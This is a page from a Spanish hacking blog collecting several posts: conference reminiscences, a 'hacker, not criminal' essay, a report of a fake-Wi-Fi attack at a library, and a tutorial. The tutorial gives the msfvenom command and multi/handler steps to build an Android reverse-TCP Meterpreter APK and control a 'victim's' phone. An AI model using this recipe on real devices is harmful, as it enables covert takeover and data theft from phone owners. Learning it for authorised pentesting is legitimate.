Mostrando entradas con la etiqueta hacker. Mostrar todas las entradas
Mostrando entradas con la etiqueta hacker. Mostrar todas las entradas

10 jul 2017

Lo que he aprendido en estos años...

Recuerdo aquel 30 de Octubre cuando dimos inicio a un proyecto llamado la Esquina del Procesador, pasando a ser a día de hoy lo que conocemos como Hackingot.
El interés de pasar el blog al hacking fue por compartir lo que he recibido en todos estos años acerca de la materia, aunque creo que me han enseñado mucho más de lo que he dado, y hoy, me gustaría hacer un resumen de todo esto aquí.

Antes de seguir dar las gracias a Tower, Fran, Petrux, Yolanda, OWASP Sevilla, Marcos, Hack And Beers y todas aquellas personas que me han enseñado de cierta manera un poco de lo que hace que sepa lo que se a día de hoy.


  • He aprendido que un sistema NO puede ser privado, pues esto es una sensación de bienestar. Toda máquina conectada es vulnerable.
  • De la mano de ToWeR he visto el verdadero sentido de los Lusers, que allá donde vallas encontrarás de todo, hasta un bocata en un armario de comunicaciones.
  • Con Yolanda Corral he visto pocos de sus ciberdebates (es algo pendiente que tengo) pero los que he podido ver demuestran que se puede entender la seguridad informática de una manera sencilla.
  • Recuerdo mi primera conferencia de seguridad, en el pabellón de Francia, en Sevilla. Organizada por OWASP Sevilla, donde conocí el movimiento y aprendí en las que he ido cosas valiosas, como montar una VPN casera, un proyecto sencillo e interesante.
  • Al igual que tantas conferencias, he podido saludar en personas a grandes del sector, como a Silvia Barrera, donde la conocí en una conferencia sobre el acoso y peligros de las redes sociales, y donde vi que mi sueño si existe, estar en la Policía Nacional y Ciberseguridad a la vez.
  • Creo que no es necesario decirlo pero, el peligro de las contraseñas débiles y lo necesario que es una autenticación en dos fases o pasos.
  • Si4Ti, aquella web, consultora de seguridad, donde pude hablar de uno de los temas que más me apasiona, el acoso en las redes y la ingeniería social.
  • He aprendido que un hacker puede ser un padre, un estudiante, un abogado, un policía, un guardia civil, una persona cualquiera, y no, no es necesario la pantalla de Matrix ni la capucha, y si, se recomienda una bombilla.
  • Todo deja rastro, aunque pases una herramienta forense, como nos explica Marcos.
  • Hay personas maravillosas que sacan adelante programas o propuestas para ayudar a la comunidad, como por ejemplo, x1red+segura, de Angel.
A todos ellos y más, miles de gracias ;)

19 mar 2017

Hablando de Seguridad | Petrux y @conpilar_zgz

Buenas Tardes ;)
Como es sabido por muchos el pasado 10 de Marzo tuvo lugar en Zaragoza #CONPilar2017, una CON de hackers, estudiantes de seguridad y cualquiera que quisiera venir en donde se compartieron buenos momentos entre talleres y descansos. Por suerte, y doy gracias, contamos con la experiencia de Pedro, mayor conocido en las redes sociales como @petruxIT.
Pedro, Guardia Civil y cibercolaborador fue un ponente en @hackandkids, la parte de la CON orientada a los más pequeños que desean iniciarse en la ciberseguridad.
Sin más os dejo la experiencia escrita por Pedro y esperemos que se animen más personas a acudir a las CON, de nuevo muchas gracias ;)

Una semana después...
Ese es el tiempo que ha pasado desde la CONPilar de este año, y aún dura la resaca. Sí, resaca, causada por lo consumido desde el viernes cuando comenzaba la tarde  y hasta el sábado ya acabando el día.
¿Que qué hemos consumido? Pues, salvando las diferencias, algo parecido al maná celestial; algo capaz de mantenernos unidos, atentos, disfrutando, aprendiendo, enseñando, compartiendo... Hemos compartido espíritu "hacker".
Mucha gente, como diría ese gran Fran a quien echamos en falta, y "mucho diferentes" pero todos juntos. Enseñando esos grandes maestros venidos de Córdoba, Guipúzcoa, Logroño, León, Guadalajara... Y de más cerca también, de Ejea y ¡de la misma Zaragoza! Aprendiendo un montón de gente de distintos ámbitos profesionales, con diferentes intereses en lo tocante a tecnología: desde los más técnicos hasta los que ¿simplemente? son padres con preocupaciones por lo que que el surfear por la web puede acarrear a los niños.
Niños que, dicho sea de paso, han tenido por vez primera en estos eventos el suyo propio: track completo, de todo el día, su "Hack&Kids". Porque este mundo digital que se nos viene encima es suyo, y es desde ya nuestra obligación el ponerles al día, el formarles, el enseñarles el camino correcto y el espíritu del "learn, hack and share".
Aprendimos, y con los mejores: Francisco Pérez Bes, Secretario General del Incibe; el magnífico Jorge Bermúdez, Fiscal de Criminalidad Informática de Guipúzcoa; el mítico Román Ramírez, fundador de la RootedCON; el siempre agudo y divertido Eloy Villa, sufridor de usuarios adictos a los tutoriales de YouTube; Pilar Andrade, empresaria apasionada por la tecnología y convencida de la cooperación; José María Otín, Inspector Jefe del GDT de la UDYCO del CNP; Pedro Canut, abogado y... ¡mil cosas más! que nos ilustró sobre el cyberbullying; ¡y la mente privilegiada de Marcos, el minion curioso! que nos demostró lo fácil que es estar sentado disfrutando de una charla para, de repente, encontrarse al otro lado, de pie, impartiéndola.
¿Y los niños? Aprendiendo a programar con Marta, Jacob y Miguel -tres "abejitas de la HoneyCON" que vinieron zumbando en cuanto los necesitamos; descubriendo con Pedro en plan DIY como se pueden enviar y recbir mensajes secretos por distintos canales de comunicación; interiorizando las pautas mínimas que deben observar en la navegación por la red... ¡y sufriendo los ataques de un malo-malísimo Eloy Villa (sí, también estuvo con los mayores)! que les demostró en vivo y en directo lo peligrosas que son las redes WiFi abiertas.
Y en los descansos, networking. Conoces personas nuevas con mucho que enseñar, con mucho que compartir, con ganas de aprender; de repente te encuentras charlando como si fuérais amigos de toda la vida con cualquiera de los ponentes, con esa magnífica gente que ha sido capaz de sacar adelante la CON, con otros asistentes, perfectos desconocidos que dejan de serlo...
¿Entiendes ahora el por qué de la resaca?¿Entiendes ahora el por qué de ir a una CON? Estás avisado: ir a una CON es superar un punto de no-retorno.
Mi consejo: Ve.

Puedes ver su blog en http://goigon.blogspot.com.es/

Por mi parte cierro la entrada con la filosofía que él me ha enseñado "Learn, Hack and Share"

14 feb 2017

Crear PAYLOAD para Android con Metasploit

En el tutorial de hoy os voy a enseñar como crear un Payload con la aplicación Metasploit integrada en Kali Linux ya que en la distro nos viene más completa que descargándola de Internet.

PAYLOAD
Un payload es un virus o malware que consiste en realizar una acción (normalmente maliciosa) en un dispositivo que esté conectado dentro de nuestra red o fuera de otra. El fin que tiene un payload es tener control total y remoto del dispositivo que se quiera interceptar en cuestión.

METASPLOIT
Metasploit es una herramienta de hacking y pentesting destinada a la explotación y tests de penetración de una manera sencilla. Esta herramienta es conocida por ser como una "navaja suiza" para los hackers y prácticamente todas las distribuciones de Linux lo traen.

¿COMO CREAMOS EL PAYLOAD?

1. Abrimos nuestro sistema operativo de seguridad preferido, luego la aplicación "Metasploit" y escribimos el comando"msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx R > name.apk"



El comando se divide en varias partes que son:
  • msfvenom -> Es la aplicación donde desarrollamos el payload
  • -p -> Estamos indicando que vamos a realizar un payload
  • android/meterpreter/reverse_tcp -> Es el tipo de payload que necesitamos
  • LHOST -> Es la IP que usará la aplicación para comunicarse con nosotros. Si se va a hacer dentro de la red nuestra el valor es 192.168.1.1 pero si es fuera de nuestra red deberá ser nuestra IP Pública
  • LPORT -> Es el puerto donde se conectará nuestra aplicación. Si la red es interna yo uso el puerto 8080 pero si es en una red exterior deberemos abrir el puerto que deseemos
  • R > name.apk -> Es la ruta donde almacenaremos el payload y con que nombre. La ruta por defecto (cuando ponemos solo el nombre, es la carpeta personal o la de root).
2. Una vez hayamos introducido el payload en el móvil de nuestra víctima ponemos los siguientes comandos:
  • msfconsole ->Iniciamos la aplicación de monitoreo
  • use multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp -> Indicamos cual payload queremos detectar
  • set LHOST xxxx -> Indicamos la IP asignada al payload.
  • set LPORT xxxx -> Indicamos el puerto asignado al payload
  • exploit
Una vez llegados a este punto deberemos tener control total sobre el teléfono.

AVISO: Este tutorial debe ser usado con fines didácticos y en un dispositivo propio ya que sino es un delito de privacidad o en todo caso con el consentimiento del dueño del terminal.

6 feb 2017

SEGURIDAD INFORMÁTICA | ROBAN VARIAS IDENTIDADES EN BIBLIOTECA

Normalmente cuando uno va a la biblioteca va a estudiar, a leer o a hacer trabajos.
También hemos dicho que nadie está seguro si tiene un Smartphone pero, ¿que pasa si combinamos ambos?

En el día de hoy, 06 de Febrero, a las 19:30 aprox. ocurrió un fenómeno extraño el cual provocaba que en nuestros móviles se conectaran a routers "ficticios" que tenían los nombres de routers asociados a nuestros móviles, es más, si entrábamos en la configuración del Wi-Fi de nuestros móviles podíamos ver varias conexiones abiertas pero, ¿cómo accedo sin quererlo a esa red?

Sencillo, si tienes una red guardada en Android o iOS, si detecta el SSID (Nombre de Red) de una guardada anteriormente el móvil se conecta a este, así sin más.

El ataque, según nos informan desde Alcalá de Guadaira, se realizó como dije anteriormente aproximadamente a las 19.30h en la Casa de la Cultura así que si has estado en ese tiempo ahí puedes haber sufrido un robo de los datos de tu teléfono así que os recomiendo revisar lo que tenéis guardado en el teléfono e incluso formatear el teléfono ante la posibilidad de virus que pueden monitorizar el teléfono en cualquier parte.

Sin más os dejo el acertijo de esta semana...

Juan, Marta y Francisco estaban en la biblioteca en el momento del ataque, uno de los nombres de los routers falsos era el de Marta pero no ha sido infectada ni atacada. ¿Cómo es posible?

25 ene 2017

Distros de Seguridad

A lo largo que escriba este blog vamos a usar varios distros de Linux (Atacantes y Servidores) y Windows (Máquina Atacada y Servidores)
En Windows usaremos todas las distros y Windows Server 2012.
En Linux usaremos las siguientes distros:
Todas las URL’s indicadas son páginas oficiales de las distros que permiten su descarga web.

1 dic 2016

Soy Hacker, no delincuente.

Bueno... hoy os traigo para leer un tema personal, que hoy en día saltan en las noticias y hasta en periódicos de renombre confunden las cosas provocando un miedo a la población, y antes de comenzar os digo...

SOY HACKER, NO DELINCUENTE

Hace unos días han saltado en las noticias unas series de acontecimientos como el ataque cibernetico a una base de datos de Alemania o un robo millonario en España y siempre aparecen en el titular la palabra "HACKER".

Son muchos los titulares que veo mes a mes de "Hackers roban un banco" o "Hackers consiguen acceder a las redes de fulanito" o incluso antivirus como AVG indicando que tengan cuidado con los Hackers pero... ¿que es un hacker?

Un hacker es una persona que tiene conocimientos de informática a un nivel mayor que un usuario y los usa para el bien y autosuperarse SIN INCUMPLIR LA LEGALIDAD DE CADA TERRITORIO.

Es decir, aquel que creó la aplicación con la que lees esto, o quien creó tu tarjeta de crédito son hackers, buscaban una solución y la hicieron pública sin hacer nada ilegal.

Otro tipo de hackers son los que se dedican a las redes, es decir, a tocar por completo una página o una red y descubrir sus vulnerabilidades, sin hacer daño ni modificar nada o en todo caso avisar del peligro que corre dicha página.

Otra cosa son los ciber delincuentes o los piratas o los crackers, aquellos que eran hackers pero empezaron a usar su conocimiento para el mal y el bien propio, consiguiendo un objetivo que es acosar a una persona o entidad o cometer delito. Para entender esto nos vamos a los Sombrero Blanco y a los Sombrero Negro.

Los sombrero blanco es como todos empezamos normalmente, tenemos conocimientos elevados de informática y redes y lo usamos para el bien común, sin hacer algo ilegal. Normalmente se promete y/o jura el Código Ético del Hacker.
Los sombrero negro son aquellos que por un motivo personal, monetario o el que sea usa sus conocimientos para la ilegalidad, y mejor  dicho, para joder.

Si escribo esto también es porque hay profesores y profesionales que confunden esto, como mi caso, que tenía un fondo de Kali Linux (decidme en  donde pone que es ilegal usar esta distro de Linux) y me acusaron a mi primero de unos ataques a la web de mi instituto alegando que era un Hacker y podía ir con denuncia a la Policía.

Tras esto espero que entendáis que ser hacker es lo mas normal, es mas, alguien de tu entorno cercano puede que lo sea, y también espero que se nos quite a los hackers la etiqueta de criminales.